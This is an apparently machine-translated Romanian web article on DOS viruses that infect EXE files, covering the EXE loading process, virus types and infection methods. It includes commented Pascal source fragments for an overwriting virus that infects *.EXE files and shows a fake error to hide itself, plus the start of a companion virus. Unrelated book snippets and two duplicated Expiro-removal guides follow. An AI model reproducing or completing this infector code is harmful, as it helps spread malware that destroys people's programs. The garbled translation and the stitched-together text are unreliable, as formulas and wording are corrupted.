Cum să ștergeți fișierul exe de la viruși. Ce sunt metodele Ex-Virus de combatere a acestora

Acest articol vorbește despre virușiinfectarea EXE FIES.. O clasificare este dată virușiAlgoritmii de lucru sunt considerați în detaliu, diferențele dintre ele de demnitate și dezavantaje.

Viruși - Aceasta este o gimnastică bună pentru minte, deși mulți oameni cred că scrierea virus Limba de nivel înalt este foarte dificilă. Acest lucru nu este așa. Scrierea în limba Pascal este destul de ușoară, deși valoarea codului rezultat determină o emoție reverentă.

Pentru fiecare tip. viruși Sunt prezentate texte sursă cu comentarii detaliate. De asemenea, sunt prezentate informațiile de bază despre structura și principiile muncii. Ex-program.

Fișierele SOM. (Programe mici scrise în principal în asamblare) încet, dar corect furate. Ei vin să se schimbe înfricoșătoare cu dimensiunea lor EXE-"Monștri". Există viruși care știu cum să infecteze EXE FIES..

Structura și procesul de încărcare ex-program

Spre deosebire de Som-program., Ex-program Poate consta din mai multe segmente (coduri, date, stivă). Ei pot ocupa mai mult de 64kb. Ex-dosar. Are un antet care este utilizat la încărcare. Rubrica constă dintr-o parte formatată care conține semnătura și datele necesare pentru descărcare Exe-dosar., și mese pentru configurarea adreselor ( Tabelul de relocare). Tabelul constă din valori în segmentul de format: offset. Pentru offsets în modulul de boot, care indică valorile din tabel, după încărcarea programului, adresa segmentului din care este descărcată programul în memorie trebuie adăugată în memorie.

Când începeți Ex-program Încărcător de sistem. (Apelarea funcției DOS 4BH) Următorii pași:

1. Este determinată adresa de segment a zonei libere de memorie, dimensiune

care este suficient pentru a plasa programul.

2. Blocul de memorie pentru variabilele de mediu este stabilit și umplut.

3. Există o unitate de memorie pentru PSP și program (segmentare - PSP;

segment + Oyuuooo-program).

Valorile corespunzătoare sunt introduse în câmpurile PSP.

4. Apăsați DTA este setat la PSP: 0080h.

5. Spațiul de lucru al încărcătorului de lucru este citit formatat

antet Exe-dosar..

6. Se adaugă lungimea modulului de încărcare cu formula:

Si7.e \u003d ((Pagecnt * 5i2) - (HDrsae * i6)) - PA! TP3IG.

7. Deplasarea modulului de pornire în fișier egal cu

8. Adresa segmentului (START_SEG) este adăugată pentru a descărca - este un PSP + Loh.

9. Modulul de pornire (începând cu adresa

START_SEG: 0000).

10. Pentru fiecare intrare de tabel de setare:

a) Citiți cuvintele i_off și i_seg;

b) se calculează Relc ^ seg-pornire ^ Seg + LSEG;

c) cuvântul este citit la relo_seg: i_off;

d) Start_seg este adăugat la citire:

e) Rezultatul este amintit de-a lungul aceleiași adrese (RELO_SEG: I_OFF).

11. Memoria programului este distribuită în conformitate cu Makhmet

12. Registrele sunt inițializate, programul se efectuează:

b) ah \u003d rezultatul verificării corectitudinii identificatorilor șoferului specificat pe linia de comandă;

c) SS ° Start_seg + Reloss, SP-exesp;

d) cs \u003d start_seg + relocuri, ip \u003d exeip.

Clasificarea virușilor exe

Ex-virus. Condițional poate fi împărțit în grupuri folosind caracteristica algoritmului ca o trăsătură. VirușiSuprascrie.) viruși A devenit deja o raritate. Principalul dezavantaj este prea nepoliticos. Programele infectate nu sunt executate deoarece virus Este scris pe partea de sus a codului programului fără a fi salvarea acesteia. Când începeți virus Căutați un alt sacrificiu (sau victimă), deschide un fișier găsit pentru a edita și înregistrează corpul la începutul programului, fără a salva codul original. Infectate cu acestea viruși Programele non-tratament nu sunt supuse.

Virusuri prin satelit (Companion)

Aceste viruși A primit numele lor din cauza algoritmului de reproducere:

un fișier satelit este creat în fiecare fișier infectat. Luați în considerare două tipuri de viruși din acest grup în detaliu:

Viruși primul tip. înmulțită după cum urmează. Pentru fiecare infectat Exe-dosar. Același director creează un fișier de cod viral care are același nume ca și cum Ex-dosar.Dar cu expansiune Som.. Virus Acesta este activat dacă numai numele fișierului executabil este specificat la promptul de comandă. Faptul este că, dacă extensia fișierului nu este specificată, Dos. Mai întâi urmărește un fișier cu numele și expansiunea specificată în directorul curent. Som.. În cazul în care un Som-dosar. Cu acest nume nu a fost găsit, căutarea cu același nume este căutată. Exe-dosar.. Dacă nu este găsit și Ex-dosar., DOS va încerca să detecteze Wat. (batch). În absența unui fișier executabil din directorul curent cu nume specificat. Căutarea se desfășoară în toate directoarele disponibile de variabilă. Cale.. Cu alte cuvinte, când utilizatorul dorește să ruleze programul și să formeze numai numele ei pe promptul de comandă (Practic, astfel încât totul se face), primul control devine virusal cărui cod este în Som-dosar.. El creeaza Som-dosar. altul sau mai multe Ex-fișiere.(se aplică) și apoi execută Ex-dosar. cu numele specificat pe linia de comandă. Utilizatorul crede că rulează doar Ex-program.

Virus satelit neutralizează destul de tocmai - ștergeți doar

Som dosar.

Viruși Al doilea tip acționează mai subtil. Nume infectate

Exe-dosar. rămâne aceeași, iar extensia este înlocuită cu orice

altul diferit de executabil ( Som, exe și wat), De exemplu,

fișierul poate obține o extensie Dat. (fișier de date) sau Ovl. (pro-

gram suprapunere). Apoi în loc Exe-dosar. Copie virale Codul. Când începeți un astfel de program infectat, gestionarea devine virale Codul situat în Fișier exe.. Infectarea altui sau mai mult EXE FIES. in acelasi fel virus Se intoarce fișier original. extensie executabilă (dar nu e Heh, și som, în măsura în care Ex-dosar. Cu acest nume este angajat în virus), după care o interpretează. Când se completează funcționarea programului infectat, extensia este returnată fișierului declanșat. Tratamentul fișierelor.infectat cu un virus de acest tip poate fi dificil dacă virus- Criptarea adecvată a unei părți sau întregul corp al fișierului infectat și înainte de execuție decodifică.

VirușiImplementat în program (parazit) Viruși Acest tip este cel mai invizibil: codul lor este înregistrat în programul infectat, care este esențial tratament cuprinzător fișiere infectate. Luați în considerare metodele de implementare Exe Virusuri în fisier.

Modalități de infectare a fișierelor exe

Cel mai comun mod de infectare EXE FIES. Astfel: corpul este terminat la sfârșitul fișierului. virusiar titlul este ajustat (cu originalul), astfel încât atunci când porniți un fișier infectat, controlul primit virus. Arata ca infectarea Fișierele SOM.Dar, în loc de o sarcină în codul de tranziție la începutul virusului, adresa de pornire a programului este ajustată. După sfârșitul lucrării, virusul scoate din antetul stocat adresa originală a pornirii programului, adaugă la componenta sa segmentată valoarea registrului DS sau ES (obținut la pornirea virusului) și transferurile controlate la adresa primită .

Următoarea metodă - Implementarea virusului la începutul fișierului de schimbare a codului

programe. Mecanismul infecției este acesta: corpul programul infectat Citiți în memorie, este scrisă în locul ei codul viral, și după aceasta - codul programe infectates. Astfel, codul programului pare a fi "schimbat" în fișier pentru lungimea codului de virus. Prin urmare, numele metodei - "Metoda Shift". Când începeți un fișier infectat virus Infectează alte sau mai multe fișiere. După aceasta, acesta citește în memorie codul programului, scrie într-un fișier temporar creat în mod specific pe disc cu extensia fișierului executabil ( Som sau ehe.), apoi execută acest fișier. Când programul a terminat munca, fișierul temporar este șters. Dacă tehnicile de protecție suplimentare nu au fost utilizate la crearea unui virus, este foarte ușor să vindecați un fișier infectat - Doar ștergeți codul de virus la începutul fișierului, iar programul va fi din nou operațional. Dezavantajul acestei metode este că întregul cod al programului infectat trebuie citit în memorie (deoarece există mai mult de 1 MB de instanțe).

Următorul mod de a infecta fișierele - Metoda de transfer - aparent, este cea mai perfectă dintre toate enumerate. Virus Multiplică după cum urmează: Când începeți un program infectat cu corpul virus Este citită de la ea. Apoi se găsește căutarea unui program neinfectat. Începutul este citit în memorie, lungimea corpului egal Virus. Corpul este scris în acest loc. virus. Programele din terminarea memoriei la sfârșitul fișierului. Prin urmare, numele metodei este "metoda de transfer". După virus Infectați unul sau mai multe fișiere, începe să execute programul de la care a început. Pentru a face acest lucru, citește începutul programului infectat salvat la sfârșitul fișierului și îl înregistrează la începutul fișierului, restabilind performanța programului. Atunci virus Șterge codul de pornire a programului de la sfârșitul fișierului, restabilind lungimea originală a fișierului și execută programul. După finalizarea programului, virusul reiterează codul la începutul fișierului, iar începutul original al programului este până la capăt. Această metodă poate fi chiar infectată antivirus.care verifică codul pentru integritate, deoarece lansarea lansată virus Programul are exact același cod ca înainte de infecție.

VirușiÎnlocuirea codului software ( Suprascrie. ) După cum sa menționat deja, această specie virușia fost mult timp mort. Ocazional apar mai mult virușilimbă Asamblare., dar este mai degrabă o competiție în scrisul cel mai mic suprascrie virusul. În prezent, cea mai mică dintre celebrul suprascrie virușii scris Memento (grupul de echipaj al morții virui) și ia 22 de octeți.

Suprascrie algoritmul de lucru virus următor:

1. Deschideți fișierul din care virusul a primit controlul.

3. Închideți fișierul.

4. Căutați după masca potrivită pentru infecție.

5. Dacă fișierele nu se găsesc nu mai sunt găsite, mergeți la pasul 11.

6. Deschideți fișierul găsit.

7. Verificați dacă fișierul găsit a fost infectat cu acest virus.

8. Dacă fișierul este infectat, mergeți la clauza 10.

9. Înregistrați codul de virus la început.

10. Închideți fișierul (opțional puteți infecta de la unul la all

pescuit în catalog sau pe disc).

11. Orice mesaj de eroare, cum ar fi "terminarea programului anormal" sau "nu este suficientă memorie", - Lăsați utilizatorul să nu fie prea surprins de faptul că programul nu a început.

12. Completați programul.

Mai jos este înregistrarea programului care infectează fișierele în acest fel.

($ M 2048, 0, 0)

(DOS și modulele de sistem sunt utilizate (modulul de sistem se conectează automat la fiecare program de compilare))

(Nume de virus)

VIRNAME \u003d "durere";

(Rând pentru a verifica reinfecția.

Se adaugă la fișierul infectat imediat după cod virus}

Virlabel: String \u003d 'Durere! 1;

(Lungimea compilării Exe-dosar.}

Autor \u003d 'murdar nazi / sgww.';

(Numărul de fișiere infectate într-o singură sesiune)

(Matrice pentru a determina prezența unei copii virus În fișierul găsit)

VIRLDENTIFIER: Gama de caractere;

(Variabila fișierului pentru lucrul cu fișierele)

(O altă variabilă de fișier - Deși fără ea a fost posibilă să faceți, va fi mai clară)

(Pentru numele fișierului găsit)

TARGETFILE: PATHSTR;

(Tampon de corp. Virus)

Virbuf: Array [-i.virlen] de caractere;

(Pentru datele / fișierul de timp)

(Numărarea numărului de fișiere infectate)

Dirlnfo: căutare;

LabelBuf: Gama de caractere;

(Inițializare)

LabelBuf: \u003d Virlabel;

LabelBuf: \u003d Virlabel,

LabelBuf: \u003d Virlabel;

(Resetați numărul de numere fișiere infectate}

(Asociem dosarul Variable Virby cu numele programului din care a început)

Atribuiți (VIBI, PARAMSTR (O));

(Deschideți fișierul cu recid \u003d 1 octet)

Resetați (VI VIBI, 1);

(Citiți corpul din fișier Virus Într-o zonă de virbuf)

Blocat (Virbody Virbuf, Virlen);

(Închideți fișierul)

(Căutați victimă)

procedură Findtarget;

(Funcția returnează TRUE dacă programul găsit este deja infectat și fals, dacă nu încă)

funcția virusPrementați: boolean;

Viruspresent: \u003d fals;

(Deschideți fișierul găsit)

Atribuirea (țintă, țintă);

Resetare (țintă, 1);

(Deplasați-vă pentru lungimea corpului virus De la începutul fișierului)

Căutați (țintă, virlen);

(Citiți 5 octeți - Dacă fișierul este deja infectat, există o etichetă virus}

Blocat (țintă, virdiantifier, 5);

Dacă Virldentifier \u003d Virrd_abel ThatN

(Dacă există o etichetă, atunci există și virus}

Viruspresent: \u003d adevărat;

(Procedura de infectare)

procedură infectată;

(Dacă dimensiunea fișierului găsit este mai mică decât lungimea virusului plus 100 octeți, apoi părăsim procedura)

Dacă sr.Size< VirLen+100 Then Exit;

Dacă programul găsit nu este încă infectat, infectarea acestuia)

Dacă nu viruspresent atunci

(Vom aminti data și ora fișierului. Nu vă amintiți atributele, deoarece căutarea este efectuată printre fișierele cu atributul de arhivă, iar acest atribut este instalat în fișier după salvare)

(Deschis la infecție)

Atribuirea (țintă, țintă);

Resetare (țintă, 1);

(Scrierea corpului virus la începutul fișierului)

Blocare (țintă, virbuf, virlen);

(Deplasați indicatorul poziției curente și lungimea virus De la începutul fișierului)

Căutați (țintă, virlen);

(Introduceți marcajul infecției)

Blocare (țintă, lablubuf, 5);

(Instalați data și ora fișierului)

Setftime (țintă, timp);

(Închide)

(Creșteți contorul fișiere infectate}

(Începutul procedurii Findtarget)

(Căutăm un fișier de mască în directorul curent * .EXE

cu atribute Arhiva.}

Findfirstf.exe ', Arhiva, SR);

(În timp ce există fișiere pentru infecție)

În timp ce doserror \u003d 0 do

Dacă sr.name \u003d "apoi ieșiți;

(Amintiți-vă numele fișierului găsit în variabila țintă)

ȚintăFile: \u003d sr.name;

(Apelați procedura de infecție)

(Dacă fișierele Infcount sunt infectate, completați căutarea)

Dacă infulosi\u003e Infcounte ieșirea;

(Căutăm următorul fișier de mască)

(Corpul principal)

(Inițializați)

(Cautam victime si infecta)

(Emitem un mesaj de eroare pe ecran)

Scrie (terminarea programului anormal ");

(Acesta este faptul că compilatorul se inserează în codul constant al Virimei și Autor, starea este setată astfel încât aceste linii să nu fie afișate niciodată)

Writeln (VIRNAME);

Scrie (autor);

Virusuri prin satelit (Companion)

Virusuri prin satelit Acum răspândită - raportul dintre companion și parazit viruși Aproximativ una la două. Crearea unei metode Som dosar. Semnificația satelitului acestei metode nu este atingerea unei "pisici străine" ( Ex-program), creați "dvs." - Som-dosar. Cu numele. Ex-program. Algoritmul de lucru al acestui lucru virus Este extrem de simplu, deoarece dispare necesitatea unor acțiuni inutile (de exemplu, conservarea în corpul virusului lungimii compilatei Exe-dosar. din codul viral, citiți în tampon de corp VirusFișier de pornire din care virus controlul primit). Nu este nevoie să stocați chiar eticheta pentru a determina infecția fișierului.

Infecția este făcută utilizând procesorul de comandă:

1. Dacă parametrii sunt specificați pe promptul de comandă, salvați-le la tipul variabil Șir pentru a transmite un program infectat.

2. Night. Ex-dosar.-Erttel.

3. Verificați dacă nu este prezent în catalog cu Exe-dosar. Som-dosar. Cu același nume ca și dosarul victimei.

4.În acest caz Som-dosar. este prezent, fișierul este deja infectat, mergeți

la clauza 6.

5. Cu ajutorul procesorului de comandă pentru a copia fișierul din care

managementul primit, la un fișier numit victimă și expansiune Som..

6.Proturn. EZEZ. Descărcați și executați un fișier cu numele de început, dar cu extensia exe - adică să efectueze un program infectat.

7. Returnați controlul la DOS.

Lista de mai jos prezintă infecția fișierului prin aceasta.

($ M 2048, 0, 0)

(Modulele DOS și modul de sistem (Modul automat de sistem

se conectează la fiecare program atunci când compilați))

(Nume de virus)

VIRNAME \u003d 'GUESF;

Autor \u003d 'murdar nazi / sgww. Numai 4 pvt! ';

(Număr infectat Pentru o sesiune de fișiere)

(Pentru numele fișierului găsit)

TARGETFILE: PATHSTR;

Metode de infectare a fișierelor exe

Cea mai obișnuită modalitate de a infecta fișierele exe este astfel: corpul virusului este adăugat la sfârșitul fișierului, iar titlul este ajustat (cu originalul), astfel încât atunci când porniți un fișier infectat, comanda a primit un virus. Se pare că contaminarea fișierelor COM, dar în loc de o sarcină în codul de tranziție la începutul virusului, adresa de pornire a programului este ajustată. După sfârșitul lucrării, virusul scoate din antetul stocat adresa originală a pornirii programului, adaugă la componenta sa segmentată valoarea registrului DS sau ES (obținut la pornirea virusului) și transferurile controlate la adresa primită .

Următoarea metodă este introducerea unui virus la începutul fișierului cu trecerea codului programului. Mecanismul de infecție este acesta: corpul programului infectat este citit în memorie, codul viral este scris în locul său, iar după acesta este codul programului infectat. Astfel, codul programului pare a fi "schimbat" în fișier pentru lungimea codului de virus. Prin urmare, numele metodei - "Metoda Shift". Când porniți un fișier infectat, virusul infectează alte sau mai multe fișiere. După aceasta, acesta citește în memorie codul programului, scrie într-un fișier temporar creat în mod specific pe disc cu extensia fișierului executabil (com sau exe) și apoi execută acest fișier. Când programul a terminat munca, fișierul temporar este șters. Dacă tehnicile de protecție suplimentare nu au fost utilizate la crearea unui virus, este foarte ușor să vindecați un fișier infectat - Doar ștergeți codul de virus la începutul fișierului, iar programul va fi din nou operațional. Dezavantajul acestei metode este că întregul cod al programului infectat trebuie citit în memorie (deoarece există mai mult de 1 MB de instanțe).

Următoarea modalitate de a infecta fișierele - metoda de transfer - aparent, este cea mai perfectă dintre toate enumerate. Virusul se înmulțește după cum urmează: Când este pornit programul infectat, corpul de virus este citit din memorie. Apoi se găsește căutarea unui program neinfectat. În memorie, începerea sa este citită, lungimea virusului este egală. Corpul de virus este scris în acest loc. Începutul programului din memorie se adaugă la sfârșitul fișierului. Prin urmare, numele metodei este "metoda de transfer". După ce virusul infectat unul sau mai multe fișiere, începe să execute programul de la care a început. Pentru a face acest lucru, citește începutul programului infectat salvat la sfârșitul fișierului și îl înregistrează la începutul fișierului, restabilind performanța programului. Apoi, virusul șterge codul de pornire a codului de la sfârșitul fișierului, restabilind lungimea originală a fișierului și execută programul. După finalizarea programului, virusul reiterează codul la începutul fișierului, iar începutul original al programului este până la capăt. Chiar și antivirusurile care verifică codul de integritate pot fi infectați cu această metodă, deoarece programul lansat de virus are exact același cod ca înainte de infecție.

Din protecția cărților calculatorului dvs. Autor Yaremchuk Serghei Akimovich.

Semne de infecție Toate programele spyware și adware (Excepție Rare) nu aplică un rău clar computerului și utilizatorului. O astfel de aplicație poate funcționa pe un computer de mult timp, iar utilizatorul nu va suspecta nimic. Activitățile acestor aplicații nu ar trebui să fie neobservate. LA

Din cartea informatică și tehnologia de informație: note de curs autor de flori și în

8.2. Metode de tratare a spamului Dacă pentru a extrage sfârșitul revistelor de la sfârșitul anilor 1990 - începutul anilor 2000, se poate găsi că articolele care descriu lupta împotriva spamului, nu. Spamul de vârf de vârf pentru perioada 2002-2003. În același timp, a început dezvoltarea activă a sistemelor

De la carte de informatică și tehnologii informatice autor de flori și în

3. vom enumera metodele de abordare și apoi vom lua în considerare caracteristicile tipurilor de bază de direcționare a operanilor în memorie: 1) Adresarea directă; Adresarea indicelui indirect.

Din carte pentru a vă proteja computerul 100% din viruși și hackeri Autor Fassetsev Oleg Mikhailovich.

52. Metode de abordare directă Adresată de această vizualizare simplă a operandului Adresarea în memorie, deoarece adresa efectivă este conținută în comandă și nu se utilizează surse sau registre suplimentare pentru ao forma. Se ia o adresă efectivă

Din cartea 200. cele mai bune programe Pentru Internet. Tutorial popular de Krainsky I.

Produse antivirus de 15 producători, inclusiv Avast!, AVG, AVZ, Avira, Bitdefender, ESET, F-Secure, Software-ul McAfee, Panda, Sophos, Symantec, Trend Micro, Virus, Symantec, Trend Micro, Virus Bloka, "Dr. . Web "," Kaspersky Lab "a avut loc pe următoarele

Din cartea Internetului. Noi oportunitati. Trucuri și efecte Autor Balovsyk Nadezhda VasilyEvna.

Metode de transmisie Există două moduri de a transmite streaming video - serial (streaming progresiv) și streaming în timp real. Dacă calitatea imaginii este întotdeauna mai bine transmisă, deoarece videoclipul este jucat cu hard disk

Din cartea Internetului - ușor și simplu! Autor Alexandrov Egor.

Căile de infecție sunt cele mai populare modalități de infectare a următorilor. - Prin Internet, așa-numitul mod "voluntar": când utilizatorul descarcă orice din rețea. Foarte des, un adevărat Win95 poate sta sub acceleratorul inofensiv al browserului. Cih (Win95. CIH, sau

De la carte de bani rapid online Autor

Modalitățile de căutare în cataloage nu reprezintă dificultăți și înțelese intuitiv. Să le găsească informatie necesara (Cu excepția cazului în care, bineînțeles, este prezentă acolo), doar posedă un bun simț. Lăsați, de exemplu, trebuie să găsiți site-ul ziarului "Muncii".

Din cartea de îndoială în magazinul online Autor Parabelloum Andrey Alekseevich.

Din cartea Linux: Ghid complet Autor Kolisnichenko Denis Nikolaevich.

Metode de plată Să vorbim despre cele mai plăcute în orice lucrare - despre salariul. La urma urmei, banii sunt într-un fel sau altul sunt scopul principal al muncii dvs. Cu toate acestea, din păcate, primirea lor este asociată cu unele dificultăți care decurg din distanțe mari între tine și

Pregătirea pentru pensiile: Am stăpânit Internetul Autor Akhmetzyanova Valentina Aleksandrovna.

Semnele de infecție consideră principalele semne care indică probabilitatea de infecție cu computerul cu un virus. Desigur, majoritatea nu pot comunica cu o precizie de o sută la sută că computerul dvs. este infectat - o parte din semne sunt uneori observate în absolut

Din cartea autorului

Metodele de luptă a virușilor sunt rele și cu nevoie rea pentru a lupta. Cu toate acestea, în primul rând merită să ne amintim un adevăr de capital - evitarea războiului este mai bună decât orice victorie. Din acest motiv, în primul rând este necesar să minimalizați riscul de viruși de la introducerea computerului și numai

Din cartea autorului

Metode de plată În ceea ce privește metodele de plată în magazinul online, atunci trebuie să oferiți clienților noștri cât mai multe oportunități pot plăti pentru comandă. După cum arată practica, cu atât mai multe opțiuni de plată, cu atât este mai mare conversia (figura 15). Dacă clientul nu găsește

Din cartea autorului

26.1. Metodele proceselor de interacțiune, cum ar fi oamenii, pot "comunica" între ei, adică, schimbul de informații. În capitolul 3, am fost fluent despre două instrumente de interacțiune interprocesare (IPC, comunicare inter-proces); Half-duplex canale (transportoare) și semnale, dar în sistemele Unix

Din cartea autorului

Metodele de câștig pentru a câștiga un pensionar nu este atât de ușor să găsească un loc de muncă, iar singurul, probabil, motivul este vârsta. Dar în spațiul virtual, vârsta nu contează. Toată lumea este egală aici: pionieri și pensionari, sănătoși și persoanele cu handicap. Totul depinde de abilitatea și

Până în prezent, majoritatea utilizatorilor de Internet se confruntă cu o problemă atunci când computerul este infectat cu viruși neobișnuiți care au un impact negativ asupra fișierelor executabile. În plus, nu toate programele antivirus sunt capabile să facă față lor.

Merită să se ocupe de ceea ce se poate face în situația actuală, precum și să ia în considerare problema eliminării virusului "exe" de pe unitatea flash.

Principiul funcționării virușilor Infectarea fișierelor exe

Problema cu activitatea virușilor acestei specii nu este inovație. Cea mai obișnuită astăzi este un triang-dăunător, numit virus.win32.expiro. A lovit pe internet nu este atât de dificil, este mult mai greu să scapi de dăunător. Acest virus este capabil să șterge fișierele exe. Mai precis, le face inaccesibile utilizatorului. Astfel, atunci când încercați să deschideți un program specific după impactul unui cod de virus rău intenționat, fișierul executabil nu este recunoscut de sistem. Ca rezultat, mesajul afișează mesajul că obiectul necesar nu este găsit. Este demn de remarcat faptul că acest lucru se aplică nu numai programelor instalate, ci și la prima lansare a instalatorului. Vorbim despre distribuția descărcată de pe Internet, care este pe hard disk.

Dacă un program este instalat dintr-un mediu optic, impactul amenințării se poate manifesta mai târziu când acest proces este finalizat. După cum știți, când instalați de la o unitate USB, virusul sare automat la acesta, infectează toate fișierele care au extensie .exe. Cu toate acestea, acțiunea virusului poate fi recunoscută numai atunci când porniți fișierul executabil. Prin urmare, în timp ce acest proces nu este implementat, cele mai multe pachete de amenințare antivirus nu sunt identificate. În plus, prezența unui virus nu este determinată deloc.

Probleme software antivirus

Merită să luați în considerare mai important și în ce mod puteți șterge. Virusul este capabil să scape de fișiere exe sau să le blocheze. Acest lucru nu este atât de important. În ambele cazuri, un băț de aproximativ două capete. După cum știți, problema este blocarea fișierelor de către virusul în sine. În același timp, vorbim despre reacția greșită a programelor antivirus. De exemplu, astăzi există multe cazuri în care se determină pachetul avast sau orice alt antivirus cu un virus de scanare definit de utilizator.

Cu toate acestea, rezultatul acest proces Se reduce doar la faptul că programul arată fișierele exagerate infectate. Când sunt imposibil de vindecat, le elimină pe cont propriu fără avertisment. Astfel, merită să spuneți că virusul elimină fișierele exe nu este de sine, ci o face cu mâinile scanner antivirus. Trebuie remarcat faptul că dăunătorul reprezentat este capabil să creeze copii și chiar deghizează sub procesele de sistem ale tipului SVCHOST.

Procedura de eliminare a virusului atunci când este infectată fișierele exe, dacă luăm în considerare lupta împotriva unei amenințări, nu este atât de simplă, deoarece pare la prima vedere. În primul rând, este recomandabil să abandonați utilizarea programelor antivirus gratuite precum Avast, AVG și altele. Opțiunea ideală va fi prezența sistemului antivirus Panda Cloud. Se recomandă utilizarea unui antivirus puternic software. Kaspersky Laboratories sau Compania ESET. În plus, puteți utiliza serviciile Utilităților de tip Kaspersky Virus de eliminare a instrumentului, dar mai întâi programul trebuie mai întâi să fie scris în mediile optice sub forma unei versiuni portabile. Pentru a face acest lucru, se aplică un computer neselectat, iar lansarea este făcută de pe CD sau DVD.

Dacă nu respectați aceste recomandări, este dificil să se garanteze un tratament de succes. În plus, puteți utiliza mai mult programe simple Tipul cureit. Acțiunea lor este trimisă la tratamentul fișierelor infectate și nu la eliminarea acestora. Deoarece virusul este de obicei în memorie cu acces aleator, decizia corectă va fi utilizarea de la un disc optic de programe familiare sub numele general al discului de salvare. Ei sunt capabili să verifice toate componentele sistemului înainte de începere. Foarte adesea, această metodă devine eficientă. Este demn de remarcat faptul că această tehnică este potrivită optimă pentru unitățile flash. Adevărat, în acest caz, în setările de scanare a dispozitivului de stocare, trebuie să setați suplimentar marcajul pe suportul USB.

Este demn de speranța că aceste recomandări vor fi utile pentru majoritatea utilizatorilor. Ei vor ajuta utilizatorii să facă față problemei, cum să eliminați virusul. Dacă există cel puțin cea mai mică suspiciune a prezenței sale, nu este posibilă rularea unui singur program nedorit până când procesul complet este de asemenea recomandat pentru obținerea unui pachet de tipul de securitate pe internet, capabil să împiedice impactul amenințării la etapa inițială.

Astăzi, mulți utilizatori din rețea "ridică" mai mulți viruși neobișnuiți care afectează fișierele executabile și chiar dacă nu toate programele antivirus se confruntă cu ele. Să încercăm să ne dăm seama ce se poate face într-o astfel de situație și, în același timp, luăm în considerare problema cum să eliminați virusul "exe" de pe unitatea flash.

Cum funcționează virușii care infectează fișierele exe?

Situația cu manifestarea activității virușilor de acest tip nu este Nova. A fost înainte. Cea mai obișnuită astăzi este un computer triang-dăunător numit virus.win32.expiro. (Versiuni "W", "AO", "BC" etc.).

Puteți să-l ridicați pe Internet complet elementar și apoi gândiți-vă ce să faceți cu el și cum să eliminați. Virusul șterge fișierele exe sau, mai degrabă, le face inaccesibile pentru execuție. Nu este surprinzător faptul că atunci când încercăm să deschideți un program sau o aplicație, ca urmare a impactului unui cod rău intenționat al virusului, sistemul nu recunoaște fișierul executabil și oferă un mesaj că un astfel de fișier nu este găsit.

Care este cel mai trist, se aplică nu numai programe instalateDar prima lansare a instalatorului (adică dacă distribuția este descărcată de pe Internet și este pe hard disk). În cazul unui program dintr-un mediu optic, impactul amenințării se poate manifesta mai târziu, după finalizarea procesului de instalare. Probabil, nu trebuie să spuneți că atunci când porniți procesul de instalare de la o unitate USB, virusul sare automat pe acesta și infectează toate fișierele care au extensie.exe.

Dar puteți recunoaște numai acțiunea virusului atunci când porniți fișierul executabil. De aceea, în timp ce dosarul nu funcționează, unele pachete de amenințare antivirus nu sunt identificate, iar prezența unui virus nu este determinată deloc.

Probleme ale software-ului antivirus

Să vedem ce și cum să ștergeți. Virusul șterge fișierele exe sau le blochează, în acest caz că nu contează. Dar aici, după cum se pare, un băț de două capete. Pe de o parte, avem de-a face cu blocarea fișierelor de către virusul în sine, pe de altă parte, reacția incorectă a programelor antivirus.

Deci, de exemplu, astăzi există câteva cazuri, atunci când același pachet avast cu o scanare definită de utilizator (și nu atunci când amenințarea este pătrunsă inițial), virusul rămâne în continuare. Adevărat, definiția este redusă numai la faptul că prezintă fișierele exagerate infectate și datorită imposibilității tratamentului le elimină fără parsare. Iată situația. Se pare că totul este simplu: toată lumea știe ce și cum să elimine. Virusul șterge fișierele exe nu chiar el însuși, ci (paradox!) Are acest lucru cu mâinile scanerului anti-virus. În mod natural, un astfel de dăunător este capabil să-și creeze propriile copii și să deghizeze chiar și sub procesele de sistem, cum ar fi SVCHOST.

Cum de a elimina virusul (fișierele exe sunt infectate)?

În ceea ce privește lupta cu o astfel de amenințare, nu este ușor aici. În primul rând, majoritatea utilizatorilor pot sfătui să nu utilizeze programe antivirus gratuite și utilități ale avului, AVG etc. În cazul extrem, ar fi mai bine să aveți o panda de tip antivirus cloud.

Cel mai cel mai bun mod - anti-virus puternic pe Kaspersky Lab sau ESET Corporation. Apropo, puteți recurge la serviciile utilitarului Kaspersky de eliminare a sculelor, doar mai întâi programul sub forma unei versiuni portabile trebuie să fie scris disc opticUtilizarea unui computer inutil pentru acest lucru și rulați exact de pe un transportator CD sau DVD. În caz contrar, tratamentul cu succes nu este garantat.

De asemenea, puteți utiliza mici programe de tip Cureit care tratează fișierele infectate și nu le ștergeți.

Dar din moment ce virusul, de regulă, "se așează" în memoria RAM, cea mai optimă soluție va fi utilizarea de pornire de la suportul optic al programelor cu numele comun al discului de salvare.

Ei verifică toate componentele sistemului înainte de pornirea proprie. În majoritatea cazurilor, această metodă este eficientă. Apropo, această tehnică este potrivită pentru unitățile flash, numai în parametrii de scanare ai dispozitivelor de stocare va trebui să pună în plus o bifă pe un suport USB.

Concluzie

În general, se pare că unele sfaturi vor ajuta majoritatea utilizatorilor să înțeleagă cum să elimine virusul. Șterge fișierele exe ale virusului în sine sau face ca blocarea neautorizată a fișierelor executabile, imediat și nu veți înțelege. Dar dacă există cel puțin cea mai mică suspiciune a prezenței sale, este extrem de recomandată să rulați orice program înainte de sfârșitul procesului de scanare completă, tratamentul de fișiere și eliminarea amenințărilor.

Printre altele, este de dorit să se aibă în sistem un pachet, cum ar fi securitatea internetului, care poate împiedica pătrunderea amenințării la etapa inițială.